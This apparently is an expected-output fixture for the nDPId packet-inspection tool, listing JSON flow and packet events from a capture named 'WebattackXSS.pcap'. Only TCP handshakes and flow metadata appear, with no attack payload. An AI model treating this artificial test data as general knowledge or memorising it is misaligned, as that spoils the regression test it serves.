+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":2,"flow_last_seen":1499347668069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347668069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6QI2lo7HDQffqaAScSDGIgAAAgQFtAQCCAoD5WVaATuT5QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":3,"flow_last_seen":1499347668070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347668070,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TE5AAD4GeYqsEAABwKgKMukCAFANB9+pNpaOyIAQAOVlKQAAAQEICgE7k+YD5WVa"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347669336,"flow_last_seen":1499347669336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347669336,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1499347669336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347669336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XbZAAD4GaBqsEAABwKgKMukQAFClPsiUAAAAAKACchBxcgAAAgQFtAQCCAoBO5UiAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":2,"flow_last_seen":1499347669336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347669336,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6RAzOJpLpT7IlaAScSA6UQAAAgQFtAQCCAoD5WaXATuVIgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":3,"flow_last_seen":1499347669337,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347669337,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XbdAAD4GaCGsEAABwKgKMukQAFClPsiVMziaTIAQAOXZWAAAAQEICgE7lSID5WaX"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347670582,"flow_last_seen":1499347670582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347670582,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1499347670582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347670582,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Rc1AAD4GgAOsEAABwKgKMukeAFDr3NOXAAAAAKACchAeiwAAAgQFtAQCCAoBO5ZaAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":2,"flow_last_seen":1499347670582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347670582,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6R5lF6M+69zTmKAScSCrXwAAAgQFtAQCCAoD5WfPATuWWgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5888,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":3,"flow_last_seen":1499347670583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347670583,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Rc5AAD4GgAqsEAABwKgKMukeAFDr3NOYZRejP4AQAOVKZwAAAQEICgE7lloD5WfP"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347673136,"flow_last_seen":1499347673136,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347673136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1499347673136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347673136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89tVAAD4GzvqsEAABwKgKMuk4AFAtrG4NAAAAAKACchA\/rgAAAgQFtAQCCAoBO5jYAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":2,"flow_last_seen":1499347673136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347673136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6ThuKc6nLaxuDqAScSCViQAAAgQFtAQCCAoD5WpNATuY2AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5906,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":3,"flow_last_seen":1499347673137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347673137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09tZAAD4GzwGsEAABwKgKMuk4AFAtrG4ObinOqIAQAOU0kQAAAQEICgE7mNgD5WpN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347674433,"flow_last_seen":1499347674433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347674433,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1499347674433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347674433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DFZAAD4GuXqsEAABwKgKMulGAFBSGZZKAAAAAKACchDxsQAAAgQFtAQCCAoBO5ocAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":2,"flow_last_seen":1499347674433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347674433,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6UarF0RiUhmWS6AScSCToAAAAgQFtAQCCAoD5WuRATuaHAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5918,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":3,"flow_last_seen":1499347674434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347674434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DFdAAD4GuYGsEAABwKgKMulGAFBSGZZLqxdEY4AQAOUypwAAAQEICgE7mh0D5WuR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347675703,"flow_last_seen":1499347675703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347675703,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1499347675703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347675703,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jIRAAD4GOUysEAABwKgKMulUAFDpsRfeAAAAAKACchDXOQAAAgQFtAQCCAoBO5taAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5929,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":2,"flow_last_seen":1499347675704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347675704,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6VSdi3bc6bEX36AScSBS\/AAAAgQFtAQCCAoD5WzPATubWgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":3,"flow_last_seen":1499347675704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347675704,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jIVAAD4GOVOsEAABwKgKMulUAFDpsRffnYt23YAQAOXyAwAAAQEICgE7m1oD5WzP"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347678198,"flow_last_seen":1499347678198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678198,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1499347678198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86nhAAD4G21esEAABwKgKMuluAFCn23eyAAAAAKACchC2sQAAAgQFtAQCCAoBO53KAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":2,"flow_last_seen":1499347678198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6W5MMi3pp9t3s6AScSDKUAAAAgQFtAQCCAoD5W8\/ATudygEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":3,"flow_last_seen":1499347678199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347678199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06nlAAD4G216sEAABwKgKMuluAFCn23ezTDIt6oAQAOVpWAAAAQEICgE7ncoD5W8\/"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 